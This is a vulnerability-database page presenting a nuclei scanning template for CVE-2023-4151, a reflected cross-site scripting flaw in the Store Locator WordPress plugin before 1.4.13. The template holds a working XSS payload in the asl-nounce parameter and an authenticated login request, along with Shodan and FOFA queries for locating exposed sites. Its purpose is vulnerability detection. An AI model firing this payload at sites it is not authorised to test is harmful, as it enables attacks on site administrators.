Lucene search
K

Store Locator WordPress < 1.4.13 - Cross-Site Scripting

🗓️ 28 Jun 2026 03:02:45Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

Store Locator WordPress < 1.4.13 - Cross-Site Scripting vulnerability with Reflected XS

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress plugin Store Locator Cross-Site Scripting Vulnerability
4 Sep 202300:00
cnnvd
CVE
CVE-2023-4151
4 Sep 202311:26
cve
Cvelist
CVE-2023-4151 Store Locator WordPress < 1.4.13 - Reflected XSS
4 Sep 202311:26
cvelist
EUVD
EUVD-2023-54031
3 Oct 202520:07
euvd
NVD
CVE-2023-4151
4 Sep 202312:15
nvd
OSV
CVE-2023-4151
4 Sep 202312:15
osv
Prion
Cross site scripting
4 Sep 202312:15
prion
Positive Technologies
PT-2023-27961 · WordPress · Store Locator
4 Sep 202300:00
ptsecurity
RedhatCVE
CVE-2023-4151
9 Jan 202612:31
redhatcve
Vulnrichment
CVE-2023-4151 Store Locator WordPress < 1.4.13 - Reflected XSS
4 Sep 202311:26
vulnrichment
Rows per page
id: CVE-2023-4151

info:
  name: Store Locator WordPress < 1.4.13 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The Store Locator WordPress plugin before 1.4.13 does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  impact: |
    Attackers can potentially exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Update the plugin to Latest version. Fixed in 1.4.13.
  reference:
    - https://wpscan.com/vulnerability/c9d80aa4-a26d-4b3f-b7bf-9d2fb0560d7b/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4151
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4151
    cwe-id: CWE-79
    epss-score: 0.00645
    epss-percentile: 0.46291
    cpe: cpe:2.3:a:agilelogix:store_locator:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 3
    vendor: agilelogix
    product: store_locator
    framework: wordpress
    fofa-query: body="/wp-content/plugins/agile-store-locator"
    publicwww-query: /wp-content/plugins/agile-store-locator/
    shodan-query: http.html:"/wp-content/plugins/agile-store-locator/"
  tags: cve,cve2023,wp,wordpress,wp-plugin,agile-store-locator,xss,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/agile-store-locator"
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin-ajax.php?action=asl_ajax_handler&asl-nounce=<img src onerror=alert`document.domain`> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '<img src onerror=alert`document.domain`>'

      - type: word
        part: content_type_2
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402201ca1e32d7fafd97b21aab36848ad339e3471b982f8aaefbecf749f34ff1fbb9902207ec392f6b76e55a56f5fd4b4c6fa4000f31b3e15b01f9c6c35854078e6e053bf:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.16.1
EPSS0.00645
SSVC
29